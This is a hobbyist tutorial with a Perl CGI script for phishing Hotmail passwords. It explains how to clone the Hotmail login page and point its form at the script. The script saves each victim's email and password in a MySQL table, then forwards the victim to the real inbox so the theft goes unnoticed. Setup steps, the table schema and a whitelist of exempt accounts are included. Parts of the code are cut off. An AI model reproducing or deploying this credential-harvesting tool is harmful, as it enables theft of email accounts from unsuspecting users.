A better way to get hotmail passwords - a little helpful program with a short tutorial


Looking all the tricky methods to get a hotmail passwords, like sending fake
mails from "Hotmail Service", and fake screens that sends the users anywhere
but hotmail, i started thinking as a user so if i get a strange mail maybe i
will send my password, maybe i don't, if i see a "login screen" that doesn't
send me to hotmail maybe i will think it is a trap :), so i will change my
password and all of us just lost some time.
Well i find a better way doing a mix of all these methods, i will explain
how it works.
Well first the fake screen is just a page in html format that i get from
hotmail login screen or from re-enter your password , then in the html code
you will find something like "<FORM TARGET=$$$$>" just put the name of my
little script in the $$$$ or in a few words put the name after the = that is
after target, so if the script name is msn.pl it will look like this <FORM
Now what? well is it easy the script will REALLY send the user to his/her
hotmail inbox, yep REALLY, but before that the password will be kept in a
mysql table :).
Ok now the configuration stuff, the script is really simple if you know some
perl, and if you don't it is too :).
Just change this:
In lamers put your DB and in host the host where your DB is.
The table for the DB, as easy as do something like this:
CREATE TABLE `htm_pass` (
`email` varchar(30) NOT NULL default '
`password` varchar(20) NOT NULL default ' ',
PRIMARY KEY (`email`)
Thats it.
And something else, if you want to exclude a hotmail account from this trick
just add it in
my @powerUsers = qw(shadox2000);
If i would like to exclude XXX@hotmail.com then i just do this:
my @powerUsers = qw(shadox2000 XXX);
You just need the part before the @hotmail.com.
For this script to work you need to have a web server that can handle perl
scripts ( Apache works perfect ) and a mysql server.
Have fun, and if you want to tell me something write me to


use CGI ":all";
use CGI::Carp qw(fatalsToBrowser);
use strict;
use DBI;

my $driver = "mysql";
my $dsn = "DBI:$driver:database=lamers;host=localhost;port=3306";
my $dbh = DBI->connect($dsn,'lamer','whatalamer');
my $lamer = param('user') || undef;
my $pass = param('pass') || undef;
my @powerUsers = qw(shadox2000);

my $str= <<EOF;
<script language="JavaScript">

$dbh->do("insert into htm_pass values ( \'$lamer\',\'$pass\' ) ") unless (
grep ( /$lamer/, @powerUsers ));;


BY Ronnie Alfaro H."